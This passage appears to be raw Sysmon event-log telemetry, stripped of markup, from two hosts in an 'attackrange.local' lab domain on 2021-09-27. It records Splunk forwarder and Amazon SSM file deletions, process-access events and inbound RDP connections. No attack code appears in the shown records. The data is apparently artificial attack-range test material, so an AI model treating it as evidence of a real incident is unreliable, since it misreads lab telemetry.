Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1093393E31D59D89981CD0C06885203B,SHA256=EC583579F1D188A489ED4C03CC4FEF7F38EF6D1D007D406AB76109D972A19AED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981145Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:19.010{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26D982ECA97968769E801B30A26BCDAB,SHA256=8950BC52B0FA45C84BE4E3F91C1F95A13477274F937A9D555B07A5177AB13161,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981147Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:20.594{69CF5F33-7F28-614D-1C00-00000000FD01}1852NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a7b4daf9c254f4db\channels\health\respondent-20210924073259-4319MD5=C03F5A35DCD33CC76F546E3EA7D3F3DF,SHA256=27CB325E5A2A8D6C4E4022C2FAED9138BDF4BFE7B38BDA6EB79267B7EDAE26D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981146Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:20.026{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29A065CC31478466548EE60E4C5C3F29,SHA256=9BCDE33472595FF605E178C8FEF74E8F8BEEEDC23659947F575131C69258895A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981149Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:21.592{69CF5F33-7F28-614D-1C00-00000000FD01}1852NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a7b4daf9c254f4db\channels\health\surveyor-20210924073257-4320MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981148Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:21.060{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C201E969B0B42E46C40A74CF4B4DE4B,SHA256=0A0F26B3457DCD02CD509585382902E556D8FB93F4A416FD1DBA694A479E73C4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001056612Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:20.451{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-56793-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001056611Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:21.834{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=793239B3713F9CEC568D56B5FA7A5EE6,SHA256=6F11ADE36D266E356F542312ACE098D4465FDCE61ACDDA0EF227AECAD3F1F65B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056610Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:21.775{5EBD8912-8CD0-6151-2F00-00000000FD01}2544NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0fd64d26ae25a9a58\channels\health\respondent-20210927092018-002MD5=418358CD28D1B50422280074BE968B1D,SHA256=C8286C1C0A91E4E2C2FF9D12E0FDD08F235EAD61265C1678C815B6AB5A1254BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056609Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:21.084{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=076B555728C04F8DF15649833EC1B019,SHA256=AC4D38CE4CF462BFC9B3BB1E4660F30037C5EAF1734E1A25B4E3A118F320FA2B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981152Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:19.773{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-59780-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000981151Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:22.468{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E2AAF7E6402E033EE441AA8D3CED7F29,SHA256=97776EEEBFE7FCBD5281AB0ABF717A87B3BE93F0ACD5F3F5086D9C89EBB62B56,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981150Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:22.091{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D4A1E0B0F778E883A73F1CA33BB43E3,SHA256=74789110A28B4A37A1925E75C931E107DE28F48E75A62DE0AB9AA3A37E099912,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001056615Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:21.130{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54233-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001056614Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:22.790{5EBD8912-8CD0-6151-2F00-00000000FD01}2544NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0fd64d26ae25a9a58\channels\health\surveyor-20210927092016-003MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056613Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:22.100{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7FCE848928243A82B161406AF32341E2,SHA256=C91FFB994F5F529834E51DA9A269E38A15A34BEFEAD00DF13542A34FA480AFE8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056616Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:23.324{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E2C712729A6C24A8F2A5C8353503FCF,SHA256=8166E1FE2A40D6C1FA8F19491AC37F8606DC0978C06C76C3FFEF73B0193809DB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981154Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:20.728{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59535-false10.0.1.12-8000- 23542300x8000000000000000981153Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:23.121{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8CAED2081F31EAACCEE048528034CF4,SHA256=FE240AE0BD4E2DCEB1A3B6A9363EA551B8BBE5DB47D7EA5BD5CEFA549E7C17E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981155Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:24.355{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16528F52D913119D4574FC46492EE7D3,SHA256=DE4895DE52BBF804E802C97F1CB8523ED66EC96B49312CEA078F33A5DC12D793,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056617Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:24.480{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F2C1948D39DB0A6D5ED02391EE7AB67,SHA256=6FB8EC922CD06C41D98E6786E226C4C2157479F6CBB1E8357F4A27AEE2D8CB02,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000981170Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:25.793{69CF5F33-8D8D-6151-147A-00000000FD01}35843100C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981169Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:25.668{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8D8D-6151-147A-00000000FD01}3584C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981168Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:25.668{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981167Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:25.668{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981166Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:25.668{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981165Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:25.668{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981164Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:25.668{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981163Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:25.668{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981162Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:25.668{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981161Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:25.668{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981160Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:25.668{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981159Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:25.668{69CF5F33-7F27-614D-0500-00000000FD01}408980C:\Windows\system32\csrss.exe{69CF5F33-8D8D-6151-147A-00000000FD01}3584C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000981158Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:25.668{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8D8D-6151-147A-00000000FD01}3584C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000981157Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:25.653{69CF5F33-8D8D-6151-147A-00000000FD01}3584C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000981156Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:25.590{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71AB3A341D2F2511037CA6585D4EEED8,SHA256=BE2BE89135E577DE4CB346A1246C65C14B1801CCF309E05100C8979B5E46B04D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056618Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:25.481{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D71DA4CD0D4CB432DB259D436657B0A7,SHA256=C26878D882915AE0C5CF34DEF249C5DD049F600665455049421016A90D957C9B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056619Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:26.496{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE132C718E25CCF3831FC6F9AE9C437A,SHA256=0B872D09FA6D29AEF6247E9381D918F8D3075CF72F005E721DDEC80A4E873C00,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981185Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:26.669{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E5C610416B6D58DEA92E2668AE9F8FE1,SHA256=3C84483E1849DC6AF971C4A34BACBADDACC918FA4659FC0424AFC4B93CA0ED1E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000981184Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:26.569{69CF5F33-8D8E-6151-157A-00000000FD01}38562392C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program 